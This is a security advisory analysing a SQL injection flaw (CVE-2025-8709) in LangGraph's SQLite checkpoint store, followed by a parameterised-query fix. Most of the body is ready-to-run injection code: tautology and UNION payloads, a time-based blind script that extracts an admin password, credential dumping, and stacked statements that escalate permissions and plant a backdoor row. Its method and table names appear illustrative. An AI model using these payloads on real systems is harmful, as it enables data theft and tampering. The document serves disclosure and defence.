LangGraph SQLite Checkpoint Store SQL Injection Vulnerability Analysis

Summary

CVE-2025-8709 is a critical SQL injection vulnerability discovered in the LangGraph SQLite checkpoint store within the langchain-ai/langchain repository. This vulnerability allows attackers to access sensitive database information, compromise data integrity, and perform unauthorized transactions.

Technical Details

Affected Version

• langgraph-checkpoint-sqlite 2.0.10

Vulnerability Origin

The security flaw arises from inadequate sanitization of filter operators ($eq, $ne, $gt, $lt, $gte, $lte) that are directly incorporated into SQL queries without proper input validation.

Vulnerability Mechanism

User-provided filter parameters are inserted directly into SQL statements without sufficient validation and without using parameterized queries:

# Unsafe code example
def list_checkpoints(self, filter_dict=None):
    query = "SELECT * FROM checkpoints WHERE 1=1"
    if filter_dict:
        for key, value in filter_dict.items():
            # User-controlled data directly added to query
            query += f" AND {key} = '{value}'"

Scenario 1: Basic SQL Injection Attack

Scenario:

A developer uses user input to filter LangGraph checkpoints:

from langgraph.checkpoint.sqlite import SQLiteSaver

checkpoint_store = SQLiteSaver("checkpoints.db")

# Attacker-controlled filter
malicious_filter = {
    "thread_id": "1' OR '1'='1' --"
}

# SQL injection triggered
results = checkpoint_store.list_checkpoints(malicious_filter)

Generated SQL Query:

SELECT * FROM checkpoints WHERE thread_id = '1' OR '1'='1' --'

Impacts:

• Access to all checkpoint records
• Disclosure of sensitive configuration information
• Compromise of user sessions

Scenario 2: UNION-Based Data Exfiltration

Scenario:

An attacker explores the database schema using UNION-based attack:

advanced_filter = {
    "metadata": "x' UNION SELECT sql FROM sqlite_master WHERE type='table' --"
}

checkpoints = checkpoint_store.list_checkpoints(advanced_filter)

Generated Query:

SELECT * FROM checkpoints WHERE metadata = 'x' 
UNION SELECT sql FROM sqlite_master WHERE type='table' --'

Discovered Information:

• Complete database table structures
• User tables and schemas
• Other sensitive system tables

Scenario 3: Unauthorized Access via Blind SQL Injection

Scenario:

An attacker extracts sensitive data using time-based blind SQL injection:

import time

def extract_admin_password():
    password_chars = "abcdefghijklmnopqrstuvwxyz0123456789"
    extracted_password = ""

    for position in range(1, 20):
        for char in password_chars:
            payload = {
                "thread_id": f"1' AND CASE WHEN (SELECT substr(password,{position},1) FROM users WHERE username='admin')='{char}' THEN randomblob(100000000) ELSE 1 END --"
            }

            start_time = time.time()
            checkpoint_store.list_checkpoints(payload)
            elapsed_time = time.time() - start_time

            if elapsed_time > 2:  # Time delay detection
                extracted_password += char
                break

    return extracted_password

Scenario 4: Business Logic Manipulation

Scenario:

An attacker manipulates checkpoint metadata to alter AI agent behavior:

malicious_metadata = {
    "agent_state": "normal'; UPDATE checkpoints SET metadata = json_set(metadata, '$.permissions', 'admin') WHERE thread_id = 'victim_thread' --"
}

checkpoint_store.update_checkpoint(
    thread_id="attack_thread", 
    checkpoint_data=malicious_metadata
)

Impacts:

• Elevation of agent permission levels
• Bypass of business logic
• Manipulation of financial transactions

Scenario 5: Multi-Layer Attack Chain

Scenario:

Real-world attack scenario:

# Step 1: Explore database schema
schema_payload = {"config": "x' UNION SELECT name FROM sqlite_master WHERE type='table' --"}
tables = checkpoint_store.list_checkpoints(schema_payload)

# Step 2: Extract user information
users_payload = {"state": "x' UNION SELECT email || ':' || password FROM users --"}
credentials = checkpoint_store.list_checkpoints(users_payload)

# Step 3: Establish persistence by creating new checkpoints
backdoor_payload = {
    "thread_id": "legitimate_id'; INSERT INTO checkpoints (thread_id, metadata) VALUES ('backdoor', '{\"malicious\": true}') --"
}
checkpoint_store.create_checkpoint(backdoor_payload)

Risk Assessment

Critical Impacts:

• ✅ Complete database access
• ✅ Sensitive data disclosure
• ✅ Business logic manipulation
• ✅ Persistent system access
• ✅ Lateral movement to other system components

Affected Systems:

• LangGraph-based AI applications
• Production systems using SQLite checkpoints
• Multi-user LangChain implementations

Solutions and Temporary Measures

Urgent Measures:

1. Version Update: Migrate to current LangGraph version
2. Input Validation: Validate all user inputs
3. Parameterized Queries: Implement SQL injection prevention techniques

Secure Coding Example:

def safe_list_checkpoints(self, filter_dict=None):
    query = "SELECT * FROM checkpoints WHERE 1=1"
    params = []

    if filter_dict:
        for key, value in filter_dict.items():
            # Only allow whitelisted fields
            if key not in ALLOWED_FILTER_FIELDS:
                continue

            # Use parameterized query
            query += f" AND {key} = ?"
            params.append(value)

    return self.execute_query(query, params)

Conclusion

CVE-2025-8709 represents a serious security threat to the LangGraph ecosystem. SQL injection vulnerabilities are particularly critical in AI/ML systems as these typically contain sensitive data and complex business logic. All developers should urgently apply security updates and adopt secure coding principles.

This security vulnerability once again emphasizes that traditional web security measures cannot be neglected even in modern AI applications.